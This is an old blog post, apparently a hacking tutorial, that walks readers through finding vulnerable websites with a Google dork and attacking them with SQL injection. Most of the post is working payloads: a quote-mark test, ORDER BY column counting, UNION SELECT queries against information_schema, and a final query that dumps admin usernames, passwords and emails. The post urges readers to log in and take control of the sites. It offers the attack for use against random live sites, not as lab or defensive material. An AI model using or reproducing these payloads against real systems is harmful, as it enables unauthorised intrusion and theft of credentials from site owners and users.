Sunday, April 19, 2015

by Hello Life on 10:51:00 AM Leave a Comment

Hack a website By Checking Vulnerability And Simple SQL Injection

First of all open Google and write this dork
  inurl:.php?id=
You will see hundred of websites having this format
   www.site.com/anything.php?id=86
          (There may be any number in place of 86)



Open Any Link. Site May Be Like This:
                     Www.Site.com/index.php?id=5

Lets see thats its Vulnerable or not. Type ' after id=5

The site will be like this:


Www.Site.com/index.php?id=5'

If it gives any SQL error, It means its Vulnerable to SQL Injection and we can Hack it.

Now we find the number of columns by using ORDER BY command

id=5 order by 1--

id=5 order by 2--

Carry on increasing numbers after ORDER BY 

Now Suppose you get any error or any message on ORDER BY 6-- such as "UNKNOWN COLUMN IN ORDER CLAUSE" 

Then it is clear that there are 5 columns in the database.
Now lets find vulnerable column which can accept our random commands and Queries.
For This we use UNION ALL SELECT columnsSeriesHere--
Such as UNION SELECT 1,2,3,4,5--
Just write this and put a Hyphen ( - ) minus sign after id= (eg, id=-5)
id=-5 union all select 1,2,3,4,5--
Now after pressing enter the new page will show you any number between 1 - 5
Suppose you see 2 anywhere on the screen it means 2nd column is vulnerable and we can insert our Queries from this column.

Find its database version
Replace 2 with @@version   or   version() in your Query.
id=5 union all select 1,@@version,3,4,5--
It will show you the Database version on the screen, now note that if you see a version 5 or greater than 5 then it is easy But if you see the version less than 5 mean 4 then we have to Guess the names of tables and columns which is very difficult.
Lets talk about version 5 or greater.
Write this...!
id=5 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()--


It will show you the whole tables of the database

Now see for admin or user because in these tables we can get admin passwords and Hack the website...

id=5 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name='admin'--

It will show all the columns of the table Admin; such as username : password : Email.)

Now final step. We will now extract the information of these columns.
id=5 union all select 1,group_concat(Username,0x3a,Password,0x3a,Email),3,4,5 from admin--
It will show the username , password and the Email of the admin
Now find admin panel , login and controll the website. Have a fun :) 
If you have any problem in any step feel free to ask.
If you Like it please share.
Thanks all.
Labels:

0 comments:

Post a Comment

loading...